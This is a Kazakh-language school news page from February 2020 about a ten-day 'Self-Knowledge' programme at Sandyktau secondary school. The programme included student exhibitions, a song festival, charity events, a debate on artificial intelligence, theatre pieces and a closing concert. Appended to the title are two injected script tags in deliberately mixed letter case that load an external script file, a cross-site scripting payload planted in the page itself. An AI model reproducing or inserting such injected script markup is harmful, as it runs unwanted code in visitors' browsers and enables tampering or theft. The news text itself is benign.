«Өзін-өзі тану: Махаббат пен шығармашылық педагогикасы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2020

«Өзін-өзі тану: Махаббат пен шығармашылық педагогикасы»

2020 жылдың 3-12 ақпан аралығында Сандықтау орта мектебінде Өзін-өзі тану онкүндігі өтті. Осы уақытта 1-11 сыныптар оқушыларының « Мен әлемді жақсы көремін» атты шығармашылық жұмыстар көрмесі өтті; «Ән – көңілдің ажары» атты оқушылар арасында ән фестивалі; «Жүректен жүрекке» атты қайырымдылық акциялары, «Мейірімді жүректер достығы».     Төменгі сынып оқушыларына сыйлықтар тапсыру; кітапханада «Өзін-өзі тану» өнегелі-рухани бағдарламаның авторы туралы көрме ұйымдастырылды.

8-11 сынып оқушылары арасында «Жақын арада жасанды зияткерлік адамды ауыстыра алады ма?» атты пікірталас өтті.

Барлық сыныптар «Арманнан жаңалыққа» театрланған қойылымдарға қатысып, ортақадамдық құндылықтар  сахналанған мысалдар көрсетті.

9-сынып оқушылары ата-аналармен «Отбасы- өмірдің ғажайып символы» атты шара ұйымдастырды, екі ұрпақ өмірлік тәжірибесімен бөлісті.

Онкүндік өнегелі-рухани бағдарламаның авторы С.А. Назарбаеваға арналған «Сүйіспеншілік – өмір негізі» тақырыпты жалпы республикалық бірыңғай сабақпен қорытындалды.

Мерекелік концертте онкүндікке белсенді қатысқан оқушыларға грамоталар мен дипломдар табыс етілді.

Просмотров: 1066


Пікір қосу



Деректерді қолтаңбаға қосу